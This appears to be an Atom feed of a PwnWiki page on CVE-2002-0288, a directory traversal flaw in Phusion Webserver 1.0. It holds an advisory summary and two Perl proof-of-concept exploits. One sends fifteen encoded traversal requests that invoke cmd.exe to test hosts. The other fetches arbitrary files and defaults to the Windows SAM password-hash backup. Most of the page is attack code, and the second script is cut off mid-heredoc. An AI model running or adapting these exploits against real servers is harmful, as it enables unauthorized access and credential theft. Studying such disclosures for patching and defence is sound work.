<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2002-0288_Phusion_web_server_1.0_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2002-0288 Phusion web server 1.0 目錄遍歷漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2002-0288_Phusion_web_server_1.0_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2002-0288_Phusion_web_server_1.0_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-09T20:00:51Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2002-0288_Phusion_web_server_1.0_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E&amp;diff=798&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO1== &lt;pre&gt; source: http://www.securityfocus.com/bid/4117/info  Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems....&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2002-0288_Phusion_web_server_1.0_%E7%9B%AE%E9%8C%84%E9%81%8D%E6%AD%B7%E6%BC%8F%E6%B4%9E&amp;diff=798&amp;oldid=prev"/>
		<updated>2021-03-31T07:05:38Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO1== &amp;lt;pre&amp;gt; source: http://www.securityfocus.com/bid/4117/info  Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems....&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO1==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source: http://www.securityfocus.com/bid/4117/info&lt;br /&gt;
&lt;br /&gt;
Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems.&lt;br /&gt;
&lt;br /&gt;
Phusion Webserver is prone to directory traversal attacks. It is possible to break out of wwwroot using triple-dot-slash (.../) sequences containing HTTP-encoded variations of &amp;quot;/&amp;quot; and &amp;quot;\&amp;quot;. As a result, a malicious web user may browse web-readable files on the host running the vulnerable software.&lt;br /&gt;
&lt;br /&gt;
This vulnerability may potentially result in the disclosure of sensitive information contained in web-readable files on the host.&lt;br /&gt;
&lt;br /&gt;
It should be noted that webservers normally run with SYSTEM privileges on Microsoft Windows operating systems. &lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/perl&lt;br /&gt;
#&lt;br /&gt;
# Simple script to identify if the host is vulnerable!, &lt;br /&gt;
# &lt;br /&gt;
# This does 15 different checks based IIS 4-5. Have Fun!&lt;br /&gt;
#&lt;br /&gt;
# Phusion Webserver v1.0 proof-of-concept exploit&lt;br /&gt;
# By Alex Hernandez &amp;lt;al3xhernandez@ureach.com&amp;gt; (C)2002.&lt;br /&gt;
#&lt;br /&gt;
# Thanks all the people from Spain and Argentina.&lt;br /&gt;
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, &lt;br /&gt;
# G.Maggiotti &amp;amp; H.Oliveira.&lt;br /&gt;
# &lt;br /&gt;
#&lt;br /&gt;
# Usage: perl -x Phusion_exp.pl &amp;lt;Hosts&amp;gt;:&amp;lt;Port&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Example: &lt;br /&gt;
#&lt;br /&gt;
# perl -x Phusion_exp.pl www.whitehouse.com:80&lt;br /&gt;
# Trying.....................&lt;br /&gt;
#&lt;br /&gt;
# &amp;lt;THIS HOST IS VULNERABLE&amp;gt; :-)&lt;br /&gt;
# Check the previous notes to execute bugs.&lt;br /&gt;
#&lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
use Socket;&lt;br /&gt;
&lt;br /&gt;
if ($#ARGV&amp;lt;0) {die &amp;quot;&lt;br /&gt;
\nPhusion Webserver v1.0 traversal exploit(c)2002.&lt;br /&gt;
Alex Hernandez al3xhernandez\@ureach.com\n&lt;br /&gt;
&lt;br /&gt;
Usage: perl -x $0 www.whitehouse.com:80 {OR}\n&lt;br /&gt;
[if the host is not using a proxy]\n&lt;br /&gt;
Usage: perl -x $0 127.0.0.1:80\n\n&amp;quot;;}&lt;br /&gt;
&lt;br /&gt;
($host,$port)=split(/:/,@ARGV[0]);&lt;br /&gt;
print &amp;quot;Trying.....................\n&amp;quot;;&lt;br /&gt;
$target = inet_aton($host);&lt;br /&gt;
$flag=0;&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 1&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir &lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 2&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir&lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 3&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir &lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 4&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir &lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 5&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir &lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 6&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir &lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 7&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir &lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 8&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir &lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 9&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir &lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 10&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir &lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 11&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir&lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 12&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir&lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 13&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir&lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 14&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../&lt;br /&gt;
winnt/system32/cmd.exe\?/c\+dir&lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
# ---------------test method 15&lt;br /&gt;
my @results=sendraw(&amp;quot;GET&lt;br /&gt;
/.../.../.../.../winnt/system32/cmd.exe\?/c\+dir&lt;br /&gt;
HTTP/1.0\r\n\r\n&amp;quot;);&lt;br /&gt;
foreach $line (@results){&lt;br /&gt;
 if ($line =~ /Directory/) {$flag=1;}}&lt;br /&gt;
&lt;br /&gt;
#------------------------------&lt;br /&gt;
if ($flag==1){print &amp;quot;&amp;lt;THIS HOST IS VULNERABLE&amp;gt; :-)\n&lt;br /&gt;
Check the previous notes to execute bugs\n&amp;quot;;}&lt;br /&gt;
else {print &amp;quot;&amp;lt;THIS HOST IS NOT VULNERABLE&amp;gt; :-( \n&lt;br /&gt;
Check manually on browser...\n&amp;quot;;}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
sub sendraw {   &lt;br /&gt;
        my ($pstr)=@_;&lt;br /&gt;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||&lt;br /&gt;
                die(&amp;quot;Socket problems\n&amp;quot;);&lt;br /&gt;
        if(connect(S,pack &amp;quot;SnA4x8&amp;quot;,2,$port,$target)){&lt;br /&gt;
                my @in;&lt;br /&gt;
                select(S);      $|=1;   print $pstr;&lt;br /&gt;
                while(&amp;lt;S&amp;gt;){ push @in, $_;}&lt;br /&gt;
                select(STDOUT); close(S); return @in;&lt;br /&gt;
        } else { die(&amp;quot;Can't connect check the port or address...\n&amp;quot;); }&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==INFO2==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source: http://www.securityfocus.com/bid/4117/info&lt;br /&gt;
 &lt;br /&gt;
Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems.&lt;br /&gt;
 &lt;br /&gt;
Phusion Webserver is prone to directory traversal attacks. It is possible to break out of wwwroot using triple-dot-slash (.../) sequences containing HTTP-encoded variations of &amp;quot;/&amp;quot; and &amp;quot;\&amp;quot;. As a result, a malicious web user may browse web-readable files on the host running the vulnerable software.&lt;br /&gt;
 &lt;br /&gt;
This vulnerability may potentially result in the disclosure of sensitive information contained in web-readable files on the host.&lt;br /&gt;
 &lt;br /&gt;
It should be noted that webservers normally run with SYSTEM privileges on Microsoft Windows operating systems. &lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/perl&lt;br /&gt;
#&lt;br /&gt;
# THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN &lt;br /&gt;
# &lt;br /&gt;
# Simple script to get files on server. &lt;br /&gt;
# &lt;br /&gt;
# Maybe u need this line for windows:&lt;br /&gt;
# #! c:\perl\bin\perl.exe&lt;br /&gt;
#&lt;br /&gt;
# Phusion Webserver v1.0 proof-of-concept exploit.&lt;br /&gt;
# By Alex Hernandez &amp;lt;al3xhernandez@ureach.com&amp;gt; (C)2002.&lt;br /&gt;
#&lt;br /&gt;
# Thanks all the people from Spain and Argentina.&lt;br /&gt;
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, &lt;br /&gt;
# G.Maggiotti &amp;amp; H.Oliveira.&lt;br /&gt;
# &lt;br /&gt;
#&lt;br /&gt;
# Usage: perl -x Phusion-GET.pl &amp;lt;And read the Intructions&amp;gt;&lt;br /&gt;
#  &lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print(&amp;quot;\nPhusion Webserver v1.0 GET Files exploit (c)2002.\n&amp;quot;);&lt;br /&gt;
print(&amp;quot;Alex Hernandez al3xhernandez\@ureach.com\n\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print &amp;lt;&amp;lt;&amp;quot;EOT&amp;quot;;&lt;br /&gt;
Please type the address remote webserver, example: www.whitehouse.gov&lt;br /&gt;
[Default remote Webserver is &amp;quot;127.0.0.1&amp;quot;`]:&lt;br /&gt;
EOT&lt;br /&gt;
$host = &amp;lt;&amp;gt;;&lt;br /&gt;
&lt;br /&gt;
print &amp;lt;&amp;lt;&amp;quot;EOT&amp;quot;;&lt;br /&gt;
Please type only in the directory where the file is located you want to&lt;br /&gt;
download, &lt;br /&gt;
example: /winnt/repair/&lt;br /&gt;
[default directory is &amp;quot;/winnt/repair/&amp;quot;] :#For IIS 4-5&lt;br /&gt;
EOT&lt;br /&gt;
$directory = &amp;lt;&amp;gt; || &amp;quot;/winnt/repair/&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print &amp;lt;&amp;lt;&amp;quot;EOT&amp;quot;;&lt;br /&gt;
Please type in the filename you want download example: sam._ &lt;br /&gt;
[default file is &amp;quot;sam._&amp;quot;] :&lt;br /&gt;
EOT&lt;br /&gt;
$file = &amp;lt;&amp;gt; || &amp;quot;sam._&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
#Maybe u to change this line depending of PATH installation.&lt;br /&gt;
system(&amp;quot;explorer.exe&amp;quot;, &amp;quot;http://$host:80/../../..$directory$file&amp;quot;);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
print &amp;lt;&amp;lt;&amp;quot;EOT&amp;quot;;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>